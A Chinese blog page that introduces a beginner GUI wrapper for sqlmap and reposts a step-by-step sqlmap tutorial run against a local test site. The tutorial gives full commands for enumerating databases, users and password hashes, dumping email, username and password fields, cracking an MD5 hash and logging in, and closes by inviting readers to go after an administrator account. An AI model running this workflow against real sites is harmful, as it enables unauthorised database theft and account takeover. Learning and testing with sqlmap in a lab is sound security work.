小白网安工具自研图形化sqlmap调用脚本

Posted Hong_Mou

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了小白网安工具自研图形化sqlmap调用脚本相关的知识,希望对你有一定的参考价值。

【小白网安工具】自研图形化sqlmap调用脚本

前言:本脚本面向小白使用(大佬用不上),脚本采用图形化界面,功能直观,安装方便
本脚本由 本人(基本代码),同窗朋友(代码优化),某名大佬(思路提供和优化)共同完成,脚本功能及优化可能会在之后的版本添加
注:此脚本建议在kali环境下运行

安装sqlxh

将文件下载下来之后在目录中打开终端,执行下面命令

sudo pip install -i https://pypi.tuna.tsinghua.edu.cn/simple pyside2

执行完后会自动安装需要的库(pyside2的大小较大尽量在网络通畅时下载)
如果执行不成功的话建议kali换源

这里我已经安装过了所以会显示成这样
这样就安装成功了

sqlxh的使用

使用非常的简单,双击sqlxh.py就可以直接运行,如果不行的话设置一下打开方式

打开页面如图

功能非常直观,只要选择功能配置好内容,点击开始就可以直接运行了
这边我简单演示一下功能

获取网页当前数据库

可以看见回显直接显示到了下方文本框,并且将关键信息直接过滤出来了,非常的人性化,和适合小白使用

获取数据库内的表名

获取表内指定字段内容

关于sqlxh

sqlxh面向小白和新手尝试使用,理解之后尽量使用命令行式的sqlmap。

sqlxh尚且还在开发,问题较多,发现问题可以反应给作者,争取在下次让sqlxh有更好的体验。

GitHub下载地址:https://github.com/dadahong/sqlxh/tree/main

sqlmap小白操作

转载地儿:http://blog.csdn.net/zgyulongfei/article/details/41017493

 

对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。

sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由python语言开发而成,因此运行需要安装python环境。

 

既然本文是基础教程,以下只写工具的基本使用方法。

本教程为sqlmap具体应用案例,如需了解更多sqlmap资料可以访问官方http://sqlmap.org ,或者乌云知识库http://drops.wooyun.org/tips/401 和 http://drops.wooyun.org/tips/143 。

 

测试环境:本地搭建的具有sql注入点的网站 http://192.168.1.150

注意:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。

 

教程开始:

一、检测注入点是否可用

 

[plain] view plain copy
 
 技术分享技术分享
  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"  

参数:

 

-u:指定注入点url

结果:

技术分享

技术分享

 

注入结果展示:

(1)注入参数id为GET注入,注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。

(2)web服务器系统为windows 2003 or XP

(3)web应用程序技术为:ASP.NET, Microsoft IIS 6.0

(4)数据库类型为:SQLSERVER 2000

 

其中图一有若干询问语句,需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下:

 

[plain] view plain copy
 
 技术分享技术分享
  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch  

 

二、暴库

 

一条命令即可曝出该sqlserver中所有数据库名称,命令如下:

 

[plain] view plain copy
 
 技术分享技术分享
  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs  


参数:

 

--dbs:dbs前面有两条杠,请看清楚。

结果:

技术分享

结果显示该sqlserver中共包含7个可用的数据库。

 

三、web当前使用的数据库

 

[plain] view plain copy
 
 技术分享技术分享
  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db  

技术分享

 

四、web数据库使用账户

 

[plain] view plain copy
 
 技术分享技术分享
  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user  


技术分享

 

 

五、列出sqlserver所有用户

 

[plain] view plain copy
 
 技术分享技术分享
  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --users  

技术分享

 

六、数据库账户与密码

 

[plain] view plain copy
 
 技术分享技术分享
  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords  

技术分享

 

七、列出数据库中的表

 

[plain] view plain copy
 
 技术分享技术分享
  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables  

参数:

 

-D:指定数据库名称

--tables:列出表

结果:

技术分享

结果体现共列出了34张表。

 

八、列出表中字段

 

[plain] view plain copy
 
 技术分享技术分享
  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns  


参数:

 

-D:指定数据库名称

-T:指定要列出字段的表

--columns:指定列出字段

结果:

技术分享

 

结果显示该userb表中包含了23条字段。

 

九、暴字段内容

 

[plain] view plain copy
 
 技术分享技术分享
  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump  

参数:

 

-C :指定要暴的字段

--dump:将结果导出

结果:

技术分享

 

如果字段内容太多,需要花费很多时间。可以指定导出特定范围的字段内容,命令如下:

 

[plain] view plain copy
 
 技术分享技术分享
  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump  

参数:

 

--start:指定开始的行

--stop:指定结束的行

此条命令的含义为:导出数据库tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的数据内容。

结果如下:

技术分享


十、验证结果

通过上图结果看到其中的一个用户信息为:

email:[email protected]

username: 1.asp

password: 49ba59abbe56e057

通过md5解密,得到该hash的原文密码为:123456

 

拿到账号密码我们来测试是否可以登录,登录结果如下:

技术分享

 

验证成功!

当然我们只是拿到普通会员账号进行登录,你也可以拿到管理员账号进行登录,后面的事情自己发挥吧,嘿嘿!

以上是关于小白网安工具自研图形化sqlmap调用脚本的主要内容,如果未能解决你的问题,请参考以下文章

喜讯 | 开源网安三款自研产品均通过CWE国际兼容性认证

纯python自研接口自动化脚本更新版本,让小白也能实现0到1万+的接口自动化用例

如何获得服务器的常见性能参数 mysql性能 jetty性能

Linux安装Sqlmap等工具

有没有iptables的图形化管理工具

sqlmap tamper脚本扩展开发(Bypass IPS)